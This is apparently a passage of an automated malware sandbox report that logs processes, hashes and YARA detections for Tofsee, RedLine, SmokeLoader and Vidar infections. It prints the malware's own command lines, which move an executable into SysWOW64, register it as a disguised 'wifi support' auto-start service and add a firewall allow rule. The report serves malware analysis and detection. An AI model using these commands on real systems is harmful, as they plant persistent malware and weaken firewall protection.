                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:08
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:09
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:09
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:10
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                                        Imagebase:0x1170000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:10
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:11
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                                                                                                                                                                                                        Imagebase:0x1170000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:11
Start date: 04/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:12
Start date: 04/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\sc.exe" start dbgxuqbr
Imagebase: 0x1170000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:13
Start date: 04/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:13
Start date: 04/01/2022
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase: 0x11f0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:15
Start date: 04/01/2022
Path: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe"
Imagebase: 0x400000
File size: 14973440 bytes
MD5 hash: F548B3529CA470C25E50AF6220AD3098
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 19:33:15
Start date: 04/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:15
Start date: 04/01/2022
Path: C:\Users\user\AppData\Local\Temp\CBA.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\CBA.exe
Imagebase: 0xf90000
File size: 539136 bytes
MD5 hash: 6C72997AA5DD44A44B27BD36347BAED9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 19:33:17
Start date: 04/01/2022
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: svchost.exe
Imagebase: 0x930000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 19:33:22
Start date: 04/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:33:27
Start date: 04/01/2022
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase: 0x7ff66d780000
File size: 455656 bytes
MD5 hash: A267555174BFA53844371226F482B86B
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 19:33:27
Start date: 04/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

                                                                                                                                                                                                        Start time:19:33:27
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:358912 bytes
                                                                                                                                                                                                        MD5 hash:1F935BFFF0F8128972BC69625E5B2A6C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:31
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        Imagebase:0x1150000
                                                                                                                                                                                                        File size:1497920 bytes
                                                                                                                                                                                                        MD5 hash:67B848B139E584BF3361A51160FC6731
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, Author: Joe Security

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:37
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4187.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\4187.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:760832 bytes
                                                                                                                                                                                                        MD5 hash:C085684DB882063C21F18D251679B0CC
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

Disassembly

Code Analysis
